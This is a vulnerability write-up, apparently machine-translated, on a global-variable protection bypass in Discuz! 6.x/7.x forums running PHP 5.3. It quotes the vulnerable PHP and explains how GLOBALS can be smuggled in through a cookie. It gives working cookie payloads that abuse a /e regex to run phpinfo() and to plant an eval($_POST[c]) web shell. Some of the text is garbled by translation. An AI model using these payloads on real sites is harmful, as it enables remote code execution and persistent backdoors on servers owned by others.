Discuz! 6. x/7.x global variable protection bypass causes Command Execution

Discuz! 6. x/7.x global variable protection bypass causes Command Execution
Vulnerability Overview:

In php5.3.x, the default value of request_order in php. ini is GP, which leads to Discuz! 6. x/7.x global variable protection Bypass Vulnerability.

Vulnerability Analysis: include/global. func. php code:

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {    foreach($$_request as $_key => $_value) {        $_key{0} != '_' && $$_key = daddslashes($_value);    }}

Code that simulates the register_globals function. When the GPC is off, the addslashes () function is called to process the variable value, however, if you directly use a variable such as $ _ GET/$ _ POST/$ _ COOKIE, this does not work, however, in the source code of dz, few users directly use the $ _ GET/$ _ POST/$ _ COOKIE, and fewer vulnerabilities exist :(

However, there are other bypass methods. In register_globals = on, you can submit the GLOBALS variable to bypass the above Code. To prevent this, dz has the following code:
 

if (isset($_REQUEST['GLOBALS']) OR isset($_FILES['GLOBALS'])) {    exit('Request tainting attempted.');}

So we can't submit the GLOBALS variable?

$ _ REQUEST the value of this super global variable is subject to php. the effect of request_order in ini. In the latest php5.3.x series, the default value of request_order is GP, that is, $ _ REQUEST contains only $ _ GET and $ _ POST by default, without $ _ COOKIE, we can use COOKIE to submit the GLOBALS variable :)

Vulnerability Exploitation
Include/discuzcode. func. php

function discuzcode($message, $smileyoff, $bbcodeoff, $htmlon = 0, $allowsmilies = 1, $allowbbcode = 1, $allowimgcode =1, $allowhtml = 0, $jammer = 0, $parsetype = '0', $authorid = '0', $allowmediacode = '0', $pid = 0) {global $discuzcodes, $credits, $tid, $discuz_uid, $highlight, $maxsmilies, $db, $tablepre, $hideattach, $allowattachurl;if($parsetype != 1 && !$bbcodeoff && $allowbbcode && (strpos($message, '[/code]') || strpos($message, '[/CODE]')) !== FALSE) {$message = preg_replace("/\s?\[code\](.+?)\[\/code\]\s?/ies", "codedisp('\\1')", $message);}$msglower = strtolower($message);//$htmlon = $htmlon && $allowhtml ? 1 : 0;if(!$htmlon) {$message = $jammer ? preg_replace("/\r\n|\n|\r/e", "jammer()", dhtmlspecialchars($message)) : dhtmlspecialchars($message);}if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) {if(!$discuzcodes['smiliesreplaced']) {foreach($GLOBALS['_DCACHE']['smilies']['replacearray'] AS $key => $smiley) {$GLOBALS['_DCACHE']['smilies']['replacearray'][$key] = '';}$discuzcodes['smiliesreplaced'] = 1;}$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);}

 

Note:

$ Message = preg_replace ($ GLOBALS ['_ DCACHE'] ['smilies '] ['searcharray'], $ GLOBALS ['_ dcache'] ['smilies'] ['replacearray'], $ message, $ maxsmilies) Success );

Cookie band in request

GLOBALS [_ DCACHE] [smilies] [searcharray] =/. */eui restart GLOBALS [_ DCACHE] [smilies] [replacearray] = phpinfo () Restart ();
You can run phpinfo.
GLOBALS [_ DCACHE] [smilies] [searcharray] = /. */eui restart GLOBALS [_ DCACHE] [smilies] [replacearray] = eval ($ _ POST [c]) % 3B success ;
That is, a Trojan.

After that, the vulnerabilities were hidden and not easily discovered.

Condition of exploits:

1. discuz 6.x/7.x

2. The default value of request_order is GP.